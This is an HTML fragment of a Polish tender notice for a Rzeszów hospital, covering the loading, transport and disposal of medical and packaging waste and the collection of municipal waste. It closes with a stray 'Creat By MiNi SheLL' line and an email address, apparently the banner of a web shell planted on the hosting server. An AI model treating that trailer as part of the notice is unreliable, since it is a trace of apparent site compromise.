<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi załadunku, transportu i unieszkodliwiania odpadów medycznych i opakowaniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi załadunku, transportu i unieszkodliwiania odpadów:
a) medycznych o kodach:
- 18 01 02 tj. części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania (z wyłączeniem 18 01 03);
- 18 01 03 tj. inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego, o których wiadomo lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt;
-  18 01 06 tj. chemikalia w tym odczynniki chemiczne zawierające substancje niebezpieczne;
-  18 01 07 chemikalia, w tym odczynniki chemiczne, inne niż wymienione w 18 01 06;
-  18 01 08 tj. leki cytotoksyczne  i cytostatyczne;
-  18 01 09 leki inne niż wymienione w 18 01 08,
b) opakowaniowych o kodzie:
-  15 02 03 tkaniny do wycierania i ubrania ochronne inne niż wymienione w 15 02 02. 
2. Przedmiot zamówienia obejmuje załadunek, transport i unieszkodliwianie odpadów medycznych i opakowaniowych, w ilościach wyszczególnionych w Formularzu cenowo-ofertowym (Załącznik nr 1 do SIWZ - do Części nr 1) 
3.Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia w ilości jak opisano w Załącznikach nr 1 do SIWZ do Części nr 1 przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.51.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi odbioru i wywozu odpadów komunalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi odbioru i wywozu odpadów komunalnych z terenu:
- Wojewódzkiego Szpitala Specjalistycznego przy ul. Szopena 2 w Rzeszowie, 
- Domu Pielęgniarek, ul. Naruszewicza 11 w Rzeszowie,
- Oddziału Dziennego Psychiatrycznego ul. Szopena 15 w Rzeszowie.
2. Przedmiot zamówienia obejmuje załadunek, transport i unieszkodliwianie odpadów medycznych i opakowaniowych, w ilościach wyszczególnionych w Formularzu cenowo-ofertowym (Załącznik nr 1 do SIWZ - do Części nr 2) 
3.Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia w ilości jak opisano w Załącznikach nr 1 do SIWZ do Części nr 2 przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6, 90.51.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com